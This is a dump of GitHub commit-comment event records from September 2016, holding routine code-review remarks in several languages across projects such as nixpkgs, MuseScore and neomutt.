{"id":"4512395872","type":"CommitCommentEvent","actor":{"login":"noubis"},"repo":{"name":"noubis/Getting-and-Cleaning-Data"},"payload":{"comment":{"id":18890471,"position":null,"line":null,"path":null,"commit_id":"d2e8537beef164a539b8d1493f6530cf0f0d6f97","created_at":"2016-09-03T16:28:00Z","updated_at":"2016-09-03T16:28:00Z","body":"tidy.txt"}},"created_at":"2016-09-03T16:28:00Z"}
{"id":"4512396005","type":"CommitCommentEvent","actor":{"login":"abbradar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18890472,"position":78,"line":184,"path":"nixos/modules/config/fonts/fontconfig-ultimate.nix","commit_id":"e3ab0826c2139253dc1717b8cff9aae599db2432","created_at":"2016-09-03T16:28:07Z","updated_at":"2016-09-03T16:28:07Z","body":"I didn't get an e-mail for this for some reason D:\r\n\r\nHm, I'm not sure about fonts, I don't think we even have them packaged. Do you mean they need to be installed along with Infinality? There are _a lot_ of them (I think 0.5GB).\r\n\r\nAlso, any luck with your custom settings?"}},"created_at":"2016-09-03T16:28:07Z"}
{"id":"4512396512","type":"CommitCommentEvent","actor":{"login":"jamison904"},"repo":{"name":"Jovy23/N930TUVU1APGC_Kernel"},"payload":{"comment":{"id":18890473,"position":null,"line":null,"path":null,"commit_id":"19d69705f33b7b85e532895d4da6f1285ae06d27","created_at":"2016-09-03T16:28:28Z","updated_at":"2016-09-03T16:28:28Z","body":"If I can get mine to compile I will look at yours. They should be almost the same. Compare yours to mine https://github.com/jamison904/SM-G935T_NA_MM"}},"created_at":"2016-09-03T16:28:28Z"}
{"id":"4512397313","type":"CommitCommentEvent","actor":{"login":"kenrachynski"},"repo":{"name":"Codeux-Software/Textual"},"payload":{"comment":{"id":18890475,"position":4,"line":44,"path":"Classes/Headers/IRCConnection.h","commit_id":"1b2264ad11016625525df0dff826b48e91b26b5b","created_at":"2016-09-03T16:29:07Z","updated_at":"2016-09-03T16:29:07Z","body":"cilent?"}},"created_at":"2016-09-03T16:29:07Z"}
{"id":"4512397496","type":"CommitCommentEvent","actor":{"login":"DREAMWORLDVOID"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18890476,"position":null,"line":null,"path":null,"commit_id":"be5721d4dbc3def77a7e28e5d2d5b2de1805d45f","created_at":"2016-09-03T16:29:14Z","updated_at":"2016-09-03T16:29:14Z","body":"其实UILib给结构说明是没有用的，因为各个模块之间的耦合度非常低（而且这次的重构更大程度地降低了耦合）所以唯一有用的类说明，但是这个就相当于帮助文档，写起来比较累"}},"created_at":"2016-09-03T16:29:14Z"}
{"id":"4512398857","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":18890478,"position":11,"line":10,"path":"spec/movie_spec.rb","commit_id":"c4db82094f11123fe530a87c86ec071cb9018d8b","created_at":"2016-09-03T16:30:15Z","updated_at":"2016-09-03T16:30:15Z","body":"Ээээ а в чём смысл этого исправления?.."}},"created_at":"2016-09-03T16:30:15Z"}
{"id":"4512399207","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":18890479,"position":5,"line":9,"path":"new_movie.rb","commit_id":"c4db82094f11123fe530a87c86ec071cb9018d8b","created_at":"2016-09-03T16:30:27Z","updated_at":"2016-09-03T16:30:27Z","body":"А тут зачем `.to_i` добавился?"}},"created_at":"2016-09-03T16:30:27Z"}
{"id":"4512399938","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18890480,"position":null,"line":null,"path":null,"commit_id":"1bd270ddd7547b91b763600cae0e10afbdcb61d0","created_at":"2016-09-03T16:30:58Z","updated_at":"2016-09-03T16:30:58Z","body":"Yes, because tuning will not work anyway without the missing lines under void init()"}},"created_at":"2016-09-03T16:30:58Z"}
{"id":"4512400641","type":"CommitCommentEvent","actor":{"login":"Profpatsch"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18890482,"position":78,"line":184,"path":"nixos/modules/config/fonts/fontconfig-ultimate.nix","commit_id":"e3ab0826c2139253dc1717b8cff9aae599db2432","created_at":"2016-09-03T16:31:30Z","updated_at":"2016-09-03T16:31:30Z","body":"Custom settings: No, I’m using the default ones right now (`ultimate4`).\r\n\r\nGood to know. My impression was that the custom fonts and the fontconfig settings certainly belong together in one package. It probably makes sense to package them and enable them if wanted by the user."}},"created_at":"2016-09-03T16:31:30Z"}
{"id":"4512401353","type":"CommitCommentEvent","actor":{"login":"dddomodossola"},"repo":{"name":"dddomodossola/remi"},"payload":{"comment":{"id":18890487,"position":null,"line":null,"path":null,"commit_id":"1eeb7c2fc5f587177358ddac29f772b5ea2fe82b","created_at":"2016-09-03T16:32:06Z","updated_at":"2016-09-03T16:32:06Z","body":"You are right John, I avoided to describe it but it's important. The bug appears for exanple if you open the editor app and adds two widgets one into another, then these widgets disappers. \r\nIt is that I made a mistake implementing the new update logic that should work as follow:\r\nEach widget has a __backup_repr that have to be returned unaltered in case of no changes.\r\nThe __backup_repr have to be updated if the widget itself or one of his children has changed(here the bugfix, where it was not checked the local_changed_widgets but the changed_widgets. Local_changed_widgets contains the children update messages).\r\nIf have to be updated than overwrite the __backup_repr otherwise return it.\r\nIf the widget itself is changed, than it is not useful to send children update messages, just send an update message for itself that already contains the updated children repr.\r\nI hope this clarifies a bit the new update message and the change."}},"created_at":"2016-09-03T16:32:06Z"}
{"id":"4512401379","type":"CommitCommentEvent","actor":{"login":"OjasA"},"repo":{"name":"lasa/website"},"payload":{"comment":{"id":18890488,"position":16,"line":11,"path":"app/views.py","commit_id":"11e73eb755acfc205fd97d7f3eb49d8aea6501f3","created_at":"2016-09-03T16:32:07Z","updated_at":"2016-09-03T16:32:07Z","body":"this"}},"created_at":"2016-09-03T16:32:07Z"}
{"id":"4512401456","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":18890489,"position":17,"line":50,"path":"spec/netflix_spec.rb","commit_id":"c4db82094f11123fe530a87c86ec071cb9018d8b","created_at":"2016-09-03T16:32:10Z","updated_at":"2016-09-03T16:32:10Z","body":"А это исправление почему?"}},"created_at":"2016-09-03T16:32:10Z"}
{"id":"4512402541","type":"CommitCommentEvent","actor":{"login":"thinkstylestudio"},"repo":{"name":"YABhq/CrudMaker"},"payload":{"comment":{"id":18890492,"position":null,"line":null,"path":null,"commit_id":"c46d9e5382dc65140092ef25b8b5641aed67b997","created_at":"2016-09-03T16:33:01Z","updated_at":"2016-09-03T16:33:01Z","body":"The removal of repo's for 5.3 or just a general change in overall structure? \r\n\r\nWill this be rolled back into 1.9.8 or laracogs? @mlantz "}},"created_at":"2016-09-03T16:33:01Z"}
{"id":"4512402698","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"madsjulia/RobustPmap.jl"},"payload":{"comment":{"id":18890493,"position":5,"line":53,"path":"src/RobustPmap.jl","commit_id":"dc3d55be096be1f956c69a0c7b945ee336164e40","created_at":"2016-09-03T16:33:10Z","updated_at":"2016-09-03T16:33:10Z","body":"It's best to be more specific about `VERSION`-dependent cutoffs like this, in case this package ever triggers a bug in base Julia that requires bisecting. `on_error` won't work on early versions of 0.5-dev."}},"created_at":"2016-09-03T16:33:10Z"}
{"id":"4512404170","type":"CommitCommentEvent","actor":{"login":"abbradar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18890494,"position":78,"line":184,"path":"nixos/modules/config/fonts/fontconfig-ultimate.nix","commit_id":"e3ab0826c2139253dc1717b8cff9aae599db2432","created_at":"2016-09-03T16:34:13Z","updated_at":"2016-09-03T16:34:13Z","body":"Yeah, at least packaging them sounds a good idea. I have a lot of deadlines approaching now but can look at this after the next week if you won't do it already ~_^."}},"created_at":"2016-09-03T16:34:13Z"}
{"id":"4512404452","type":"CommitCommentEvent","actor":{"login":"DimoEdgard"},"repo":{"name":"DimoEdgard/DimoEdgard"},"payload":{"comment":{"id":18890495,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-03T16:34:25Z","updated_at":"2016-09-03T16:34:25Z","body":"193266989"}},"created_at":"2016-09-03T16:34:25Z"}
{"id":"4512405004","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"luther9/bloc-jams"},"payload":{"comment":{"id":18890497,"position":81,"line":122,"path":"scripts/album.js","commit_id":"b0264f8239ed00f7980f34a3139afe66c560594b","created_at":"2016-09-03T16:34:54Z","updated_at":"2016-09-03T16:34:54Z","body":"Goodbye old assignments."}},"created_at":"2016-09-03T16:34:54Z"}
{"id":"4512405467","type":"CommitCommentEvent","actor":{"login":"hooperfly"},"repo":{"name":"paparazzi/paparazzi"},"payload":{"comment":{"id":18890498,"position":null,"line":null,"path":null,"commit_id":"16a447da37ea718646906756cda17a5ed38d8739","created_at":"2016-09-03T16:35:14Z","updated_at":"2016-09-03T16:35:14Z","body":"@gautierhattenberger thanks for the clarification. In the case of the NES, SNES, and N64 joystock configuration files, I currently use `auto2_mode`. Wonder if it makes more sense to use `ap_mode` to avoid the requirement of an RC?"}},"created_at":"2016-09-03T16:35:14Z"}
{"id":"4512406033","type":"CommitCommentEvent","actor":{"login":"DimoEdgard"},"repo":{"name":"DimoEdgard/DimoEdgard"},"payload":{"comment":{"id":18890499,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-03T16:35:41Z","updated_at":"2016-09-03T16:35:41Z","body":"\t+    sudo_users = {193266989},"}},"created_at":"2016-09-03T16:35:41Z"}
{"id":"4512406347","type":"CommitCommentEvent","actor":{"login":"sidewayss"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":18890500,"position":6,"line":74,"path":"libmscore/mscore.h","commit_id":"4ac407d90ec1d5663f0c753acc3ef5f4bcca2422","created_at":"2016-09-03T16:35:58Z","updated_at":"2016-09-03T16:35:58Z","body":"What is the purpose of this new constant, DPI_F?  I only see it being used explicitly in sym.cpp and here, but the changes here are big, as far as I'm concerned:\r\n- DPI now equals 360, not 72.\r\n- SPATIUM20 now equals 25, not 5."}},"created_at":"2016-09-03T16:35:58Z"}
{"id":"4512411140","type":"CommitCommentEvent","actor":{"login":"oalexey"},"repo":{"name":"xbadcode/Rubezh"},"payload":{"comment":{"id":18890506,"position":22,"line":553,"path":"Projects/FireMonitor/Modules/SKDModule/Employees/ViewModels/EmployeeDetails/EmployeeDetailsViewModel.cs","commit_id":"bbaa7aadbe651e4ae232ea01afe8cd92e5857531","created_at":"2016-09-03T16:39:40Z","updated_at":"2016-09-03T16:39:40Z","body":"\"Изначально было предложено перенести общую проверку на уровень выше\"\r\n\r\nНе получится, т.к. присвоение значения **SelectedDepartment** должно произойти в любом случае, не зависимо от значения **departmentSelectionViewModel.SelectedDepartment** после закрытия диалогового окна. Ты же предлагаешь выполнить это присвоение только при **departmentSelectionViewModel.SelectedDepartment != null**!!!\r\nОбъясню на пальцах что должно быть.\r\n1. В свойствах текущего объекта (например сотрудника) ты нажимаешь на подразделении, в которое входит данный объект.\r\n2. Открывается окно со списком подразделений, где можно указать какое-либо подразделение (**departmentSelectionViewModel.SelectedDepartment != null**), либо открепить от подразделения (**departmentSelectionViewModel.SelectedDepartment == null**).\r\n3. Присвоить результат **SelectedDepartment** после закрытия окна списка подразделений."}},"created_at":"2016-09-03T16:39:40Z"}
{"id":"4512411421","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":18890507,"position":6,"line":70,"path":"movie_collection.rb","commit_id":"e88aaf7f65c8f681780e54d3aae156682fa65bd2","created_at":"2016-09-03T16:39:52Z","updated_at":"2016-09-03T16:39:52Z","body":"Мне кажется, или у нас уже был где-то метод, возвращающий «все уникальные жанры в этой коллекции»?"}},"created_at":"2016-09-03T16:39:52Z"}
{"id":"4512412560","type":"CommitCommentEvent","actor":{"login":"mplazac"},"repo":{"name":"mplazac/SCA10"},"payload":{"comment":{"id":18890510,"position":null,"line":null,"path":null,"commit_id":"d279edaf675d6ab90049c9d010b7b2fe755a33b5","created_at":"2016-09-03T16:40:41Z","updated_at":"2016-09-03T16:40:41Z","body":"ver 0"}},"created_at":"2016-09-03T16:40:41Z"}
{"id":"4512413495","type":"CommitCommentEvent","actor":{"login":"kAworu"},"repo":{"name":"rkitover/vimpager"},"payload":{"comment":{"id":18890513,"position":14,"line":612,"path":"vimpager","commit_id":"0c12a062363e751e830acc49c2ec402aaf4e89d4","created_at":"2016-09-03T16:41:22Z","updated_at":"2016-09-03T16:41:22Z","body":"here `tmp_dir` should be `tmp` correct?"}},"created_at":"2016-09-03T16:41:22Z"}
{"id":"4512414693","type":"CommitCommentEvent","actor":{"login":"MightySCollins"},"repo":{"name":"Jason2605/AdminPanel"},"payload":{"comment":{"id":18890516,"position":1,"line":1,"path":"chatRoom/vendor/jamesmoss/flywheel/src/JamesMoss/Flywheel/error_log","commit_id":"5079b7a45f9cb0aa6560346d1478b9e313b58de3","created_at":"2016-09-03T16:42:15Z","updated_at":"2016-09-03T16:42:15Z","body":"Try not to commit error logs..."}},"created_at":"2016-09-03T16:42:15Z"}
{"id":"4512415048","type":"CommitCommentEvent","actor":{"login":"kAworu"},"repo":{"name":"rkitover/vimpager"},"payload":{"comment":{"id":18890518,"position":null,"line":null,"path":null,"commit_id":"0c12a062363e751e830acc49c2ec402aaf4e89d4","created_at":"2016-09-03T16:42:29Z","updated_at":"2016-09-03T16:42:29Z","body":"It seems to me that this patch has a typo."}},"created_at":"2016-09-03T16:42:29Z"}
{"id":"4512415592","type":"CommitCommentEvent","actor":{"login":"SH-M"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18890519,"position":null,"line":null,"path":null,"commit_id":"4271474c8cc6e4ff1651740686dcb6f1a6c88f0c","created_at":"2016-09-03T16:42:52Z","updated_at":"2016-09-03T16:42:52Z","body":"The cockpit in the master branch has now broken instruments.\r\nIf everyone is ok with that till we fix it, I am ok with deleting the other branch."}},"created_at":"2016-09-03T16:42:52Z"}
{"id":"4512415711","type":"CommitCommentEvent","actor":{"login":"MightySCollins"},"repo":{"name":"Jason2605/AdminPanel"},"payload":{"comment":{"id":18890520,"position":38,"line":38,"path":"chatRoom/publish.php","commit_id":"103c0b22fec63dd678ad6e16a10c6af3d2ebe6cb","created_at":"2016-09-03T16:42:58Z","updated_at":"2016-09-03T16:42:58Z","body":"Its normally good practice to not close your PHP files to avoid excess white space on pages"}},"created_at":"2016-09-03T16:42:58Z"}
{"id":"4512417251","type":"CommitCommentEvent","actor":{"login":"MightySCollins"},"repo":{"name":"Jason2605/AdminPanel"},"payload":{"comment":{"id":18890522,"position":1,"line":1,"path":"chatRoom/vendor/autoload.php","commit_id":"263b4b37bd31de11fa2e66dbcb0d6c101b2113d9","created_at":"2016-09-03T16:44:07Z","updated_at":"2016-09-03T16:44:07Z","body":"Really try and not commit any vendor stuff, its bad practice, just have the users composer install"}},"created_at":"2016-09-03T16:44:07Z"}
{"id":"4512417521","type":"CommitCommentEvent","actor":{"login":"DREAMWORLDVOID"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18890524,"position":5,"line":36,"path":"src/shared/takedatahelper.h","commit_id":"44b02fb112cc155c6245917b229eaa78f80a5ab1","created_at":"2016-09-03T16:44:18Z","updated_at":"2016-09-03T16:44:18Z","body":"这个是非标准代码，只有VS支持这样做。你应该自己实现一个runtime-exception然后重载what函数"}},"created_at":"2016-09-03T16:44:18Z"}
{"id":"4512419658","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18890526,"position":5,"line":36,"path":"src/shared/takedatahelper.h","commit_id":"44b02fb112cc155c6245917b229eaa78f80a5ab1","created_at":"2016-09-03T16:45:52Z","updated_at":"2016-09-03T16:45:52Z","body":"这里travis-ci就报错了，你也可以`throw std::runtime_error(\"\");`"}},"created_at":"2016-09-03T16:45:52Z"}
{"id":"4512419740","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":18890527,"position":10,"line":74,"path":"movie_collection.rb","commit_id":"e88aaf7f65c8f681780e54d3aae156682fa65bd2","created_at":"2016-09-03T16:45:58Z","updated_at":"2016-09-03T16:45:58Z","body":"Почитай подсказки к этому подзаданию ;) С таким подходом можно написать всякие диковинные вещи, которых мы тут не очень хотим:\r\n```ruby\r\ncollection.by_genre.cash # => потому что он же сам себя вернул\r\n# или \r\ncollection.by_genre.comedy # => ок\r\ncollection.drama # потому что метод-то уже определён\r\n```"}},"created_at":"2016-09-03T16:45:58Z"}
{"id":"4512420677","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18890530,"position":5,"line":36,"path":"src/shared/takedatahelper.h","commit_id":"44b02fb112cc155c6245917b229eaa78f80a5ab1","created_at":"2016-09-03T16:46:37Z","updated_at":"2016-09-03T16:46:37Z","body":"Travis-ci已经修复了，建议多看看travis-ci的编译报告\r\n"}},"created_at":"2016-09-03T16:46:37Z"}
{"id":"4512426404","type":"CommitCommentEvent","actor":{"login":"dipeshkumar"},"repo":{"name":"openosk/openosk.github.io"},"payload":{"comment":{"id":18890531,"position":null,"line":null,"path":null,"commit_id":"c2d54f3e33a59b989c6921cd5b90e2b6db275e7f","created_at":"2016-09-03T16:50:39Z","updated_at":"2016-09-03T16:50:39Z","body":"I guess Editing the last years sfd site is not a good idea. You guys have archived the SFD2014 site to another link. In this way the site would have archived.\r\n\r\nBut now, a direct edit has made the original site of SFD2014 lost. \r\nI request to fork and old one and then edit it to new contents.\r\n"}},"created_at":"2016-09-03T16:50:39Z"}
{"id":"4512427211","type":"CommitCommentEvent","actor":{"login":"zero-24"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":18890532,"position":5,"line":226,"path":"tests/unit/suites/libraries/joomla/JFactoryTest.php","commit_id":"133e4b6e232a5303b9f20eed83cc151cf728a4de","created_at":"2016-09-03T16:51:12Z","updated_at":"2016-09-03T16:51:12Z","body":"@wilsonge is this an expected change? As it does not exists in the PR? https://github.com/joomla/joomla-cms/pull/10638/files"}},"created_at":"2016-09-03T16:51:12Z"}
{"id":"4512427331","type":"CommitCommentEvent","actor":{"login":"zyla"},"repo":{"name":"sdiehl/write-you-a-haskell"},"payload":{"comment":{"id":18890533,"position":71,"line":150,"path":"006_hindley_milner.md","commit_id":"73b43dcf89210e75b508694df675961b4e22e0ff","created_at":"2016-09-03T16:51:17Z","updated_at":"2016-09-03T16:51:17Z","body":"It's certainly possible:\r\n\r\n```haskell\r\ndata Bad a = Bad Int a deriving (Show)\r\ninstance Functor Bad where\r\n    fmap f (Bad n x) = Bad (n + 1) (f x)\r\n```\r\n\r\nthen:\r\n```haskell\r\nλ> fmap ((+1) . (+2)) $ Bad 0 0\r\nBad 1 3\r\nλ> fmap (+1) . fmap (+2) $ Bad 0 0\r\nBad 2 3\r\n```"}},"created_at":"2016-09-03T16:51:17Z"}
{"id":"4512427879","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18890534,"position":null,"line":null,"path":null,"commit_id":"c8652adf992ea25f6890c7179f7f52d88fedcf61","created_at":"2016-09-03T16:51:45Z","updated_at":"2016-09-03T16:51:45Z","body":"The only thing which I didn't take into consideration is the following point of the guide:\r\nChange Test options to read Hash=128 nodestime=600\r\n\r\nIf this is mandatory please reject the test/tune and explain to me if I should put both test and base as 128 hash, and where to put nodestime = 600 [Because I couldn't find it]"}},"created_at":"2016-09-03T16:51:45Z"}
{"id":"4512430235","type":"CommitCommentEvent","actor":{"login":"wschweer"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":18890537,"position":6,"line":74,"path":"libmscore/mscore.h","commit_id":"4ac407d90ec1d5663f0c753acc3ef5f4bcca2422","created_at":"2016-09-03T16:53:35Z","updated_at":"2016-09-03T16:53:35Z","body":"With dpi=72 i got very bad text bounding boxes. A multiple of 72 (the DPI_F value) gives much better results."}},"created_at":"2016-09-03T16:53:35Z"}
{"id":"4512430489","type":"CommitCommentEvent","actor":{"login":"Jbithell"},"repo":{"name":"BluePost/BlueUtils"},"payload":{"comment":{"id":18890538,"position":null,"line":null,"path":null,"commit_id":"1a18f81c2069936c23d4a1ecd69d40236aaaaff5","created_at":"2016-09-03T16:53:49Z","updated_at":"2016-09-03T16:53:49Z","body":"Classic"}},"created_at":"2016-09-03T16:53:49Z"}
{"id":"4512430536","type":"CommitCommentEvent","actor":{"login":"rugk"},"repo":{"name":"jelhan/croodle"},"payload":{"comment":{"id":18890539,"position":null,"line":null,"path":null,"commit_id":"3cf26d722149f7605cab241065c0a40348444970","created_at":"2016-09-03T16:53:51Z","updated_at":"2016-09-03T16:53:51Z","body":"You do not need to set `media-src` (or `img-src`) to `'none'` manually as `default-src` is already set to `none` so just removing `media-src` is enough."}},"created_at":"2016-09-03T16:53:51Z"}
{"id":"4512431769","type":"CommitCommentEvent","actor":{"login":"smeshny"},"repo":{"name":"smeshny/recipes"},"payload":{"comment":{"id":18890540,"position":null,"line":null,"path":null,"commit_id":"2f0fbb7bbdd9383c4378633fb3804b2314c43c47","created_at":"2016-09-03T16:54:52Z","updated_at":"2016-09-03T16:54:52Z","body":"1"}},"created_at":"2016-09-03T16:54:52Z"}
{"id":"4512434494","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"ceylon/ceylon-lang.org"},"payload":{"comment":{"id":18890542,"position":5,"line":52,"path":"documentation/1.2/reference/operator/decrement.md","commit_id":"3e5feec526884106f656949f798ed4d8204759c3","created_at":"2016-09-03T16:56:46Z","updated_at":"2016-09-03T16:56:46Z","body":"Slightly less offensive, I think, but not worth changing:\r\n\r\n    (() { value x = lhs; --lhs; return x; })()"}},"created_at":"2016-09-03T16:56:46Z"}
{"id":"4512435388","type":"CommitCommentEvent","actor":{"login":"FGDATA"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18890543,"position":null,"line":null,"path":null,"commit_id":"4271474c8cc6e4ff1651740686dcb6f1a6c88f0c","created_at":"2016-09-03T16:57:33Z","updated_at":"2016-09-03T16:57:33Z","body":"sure. I'll go ahead :+1:  \r\n\r\nAlso, I did some work on the propellers. \r\nIt is not perfect, but it turns much more symmetrically now, and the disk also spins."}},"created_at":"2016-09-03T16:57:33Z"}
{"id":"4512435733","type":"CommitCommentEvent","actor":{"login":"k9101"},"repo":{"name":"k9101/FCAlertView"},"payload":{"comment":{"id":18890544,"position":null,"line":null,"path":null,"commit_id":"2f4d2ce8a0d58dace2ec53e5b74e6702fc1fd523","created_at":"2016-09-03T16:57:48Z","updated_at":"2016-09-03T16:57:48Z","body":"Hey Nima, \n\nThanks for reaching out! So far I’ve roughly translated from ObjC to Swift, just taken the week off to enjoy the last week of summer :). Some time this week I’ll refactor a bit to clean things up and take advantage of Swift features.\n\nI’ll keep you posted.\n\n \n\nOn Sat, Sep 03, 2016 at 4:11 AM Nima Tahami\n\n<\nmailto:Nima Tahami <notifications@github.com>\n> wrote:\n\na, pre, code, a:link, body { word-wrap: break-word !important; }\n\nHey Kris,\n\nNoticed you're working on the Swift version for FCAlertView, which is very awesome and exciting.\n\nWanted to just check up with you and see how it's going, see if there's any issues or questions you might have or if I can help contribute to it in any way, although I mostly work in ObjC as you've noticed.\n\nLet me know\n\n👍\n\nhttps://github.com/k9101\n\n—\n\nYou are receiving this because you were mentioned.\n\nReply to this email directly,\nhttps://github.com/k9101/FCAlertView/commit/2f4d2ce8a0d58dace2ec53e5b74e6702fc1fd523#commitcomment-18889280\n, or\nhttps://github.com/notifications/unsubscribe-auth/AB0jKA2FNcZgnFAZgwZerIJo4_PgHU2Hks5qmSuggaJpZM4J0QLl\n."}},"created_at":"2016-09-03T16:57:48Z"}
{"id":"4512435806","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"ceylon/ceylon-lang.org"},"payload":{"comment":{"id":18890545,"position":5,"line":52,"path":"documentation/1.2/reference/operator/decrement.md","commit_id":"3e5feec526884106f656949f798ed4d8204759c3","created_at":"2016-09-03T16:57:51Z","updated_at":"2016-09-03T16:57:51Z","body":"Well, the page claims to cite the definition. I guess it could be defined like that, but that would be suggested elsewhere."}},"created_at":"2016-09-03T16:57:51Z"}
{"id":"4512436487","type":"CommitCommentEvent","actor":{"login":"ccrama"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18890546,"position":22,"line":267,"path":"app/src/main/java/me/ccrama/redditslide/CommentCacheAsync.java","commit_id":"17e6bd954de1aca76636f65dc04aa154330c3124","created_at":"2016-09-03T16:58:23Z","updated_at":"2016-09-03T16:58:23Z","body":"Good find, thank you @prashantkhurana !"}},"created_at":"2016-09-03T16:58:23Z"}
{"id":"4512438275","type":"CommitCommentEvent","actor":{"login":"xunihaoma"},"repo":{"name":"xunihaoma/iceflower"},"payload":{"comment":{"id":18890549,"position":null,"line":null,"path":null,"commit_id":"14c1444367d3bd4508d9fcf324d954d4b4f79ff7","created_at":"2016-09-03T16:59:47Z","updated_at":"2016-09-03T16:59:47Z","body":"fucking you"}},"created_at":"2016-09-03T16:59:47Z"}
{"id":"4512438334","type":"CommitCommentEvent","actor":{"login":"dg9vh"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":18890550,"position":null,"line":null,"path":null,"commit_id":"2163827921f34b353a67604908ac8d13831a5745","created_at":"2016-09-03T16:59:50Z","updated_at":"2016-09-03T16:59:50Z","body":"@aeickho checked and approved to be better than V1 :-)"}},"created_at":"2016-09-03T16:59:50Z"}
{"id":"4512438763","type":"CommitCommentEvent","actor":{"login":"grobian"},"repo":{"name":"neomutt/neomutt-flatcap"},"payload":{"comment":{"id":18890551,"position":24,"line":356,"path":"copy.c","commit_id":"8ffa473227cd121a88aeb7512569dc651a361992","created_at":"2016-09-03T17:00:09Z","updated_at":"2016-09-03T17:00:09Z","body":"this is an unrelated whitespace change"}},"created_at":"2016-09-03T17:00:09Z"}
{"id":"4512439281","type":"CommitCommentEvent","actor":{"login":"grobian"},"repo":{"name":"neomutt/neomutt-flatcap"},"payload":{"comment":{"id":18890552,"position":49,"line":700,"path":"copy.c","commit_id":"8ffa473227cd121a88aeb7512569dc651a361992","created_at":"2016-09-03T17:00:25Z","updated_at":"2016-09-03T17:00:25Z","body":"ditto"}},"created_at":"2016-09-03T17:00:25Z"}
{"id":"4512439742","type":"CommitCommentEvent","actor":{"login":"grobian"},"repo":{"name":"neomutt/neomutt-flatcap"},"payload":{"comment":{"id":18890554,"position":58,"line":735,"path":"copy.c","commit_id":"8ffa473227cd121a88aeb7512569dc651a361992","created_at":"2016-09-03T17:00:41Z","updated_at":"2016-09-03T17:00:41Z","body":"same here"}},"created_at":"2016-09-03T17:00:41Z"}
{"id":"4512440230","type":"CommitCommentEvent","actor":{"login":"jordanh"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":18890555,"position":88,"line":207,"path":"src/server/graphql/models/Team/teamMutation.js","commit_id":"bdce9a9c8f920314d5b3431f71fd791ce229713e","created_at":"2016-09-03T17:01:05Z","updated_at":"2016-09-03T17:01:05Z","body":"I think we should ditch it then – the negative affects may outweigh the benefits."}},"created_at":"2016-09-03T17:01:05Z"}
{"id":"4512441272","type":"CommitCommentEvent","actor":{"login":"sidewayss"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":18890560,"position":6,"line":74,"path":"libmscore/mscore.h","commit_id":"4ac407d90ec1d5663f0c753acc3ef5f4bcca2422","created_at":"2016-09-03T17:01:54Z","updated_at":"2016-09-03T17:01:54Z","body":"Higher resolution does have benefits.  Does this have significant impact on the way DPI and screen resolution interact?  Do you see it having any impact on SVG export, which exports in pixels/points?  SVG is natively pixel-based, but can draw lines/paths, or it can use the Emmentaler font to paint a lot of the graphics in MuseScore.  I'm trying to think this through as I write this line note...  I'm using the font to draw music in SVG because it's far more efficient at run-time.  I think that's where my biggest concern lies, that relationship between the font and the lines that SVG has to draw, like staff and bar lines.\r\nGit fails to automatically rebase this commit with my code, so it will take me longer than usual to test this out..."}},"created_at":"2016-09-03T17:01:54Z"}
{"id":"4512442301","type":"CommitCommentEvent","actor":{"login":"SethTisue"},"repo":{"name":"adriaanm/community-builds"},"payload":{"comment":{"id":18890561,"position":null,"line":null,"path":null,"commit_id":"0e4abd29502c836283848f4f13fc2685ef2a45e5","created_at":"2016-09-03T17:02:42Z","updated_at":"2016-09-03T17:02:42Z","body":"Scalactic and ScalaTest 3.0 are both included these days. Did you see an error that involved Scalactic?"}},"created_at":"2016-09-03T17:02:42Z"}
{"id":"4512444503","type":"CommitCommentEvent","actor":{"login":"stargo"},"repo":{"name":"CyanogenMod/android_kernel_motorola_omap4-common"},"payload":{"comment":{"id":18890563,"position":null,"line":null,"path":null,"commit_id":"3c2e7737e24a4b1a49367ff991c5458fc4bc4d3f","created_at":"2016-09-03T17:04:25Z","updated_at":"2016-09-03T17:04:25Z","body":"Because it made the lags even worse...\r\n\r\nIf you find a better working memory management, I'm more than happy to take it and merge it in (I currently don't have much time to work on Android :-( )"}},"created_at":"2016-09-03T17:04:25Z"}
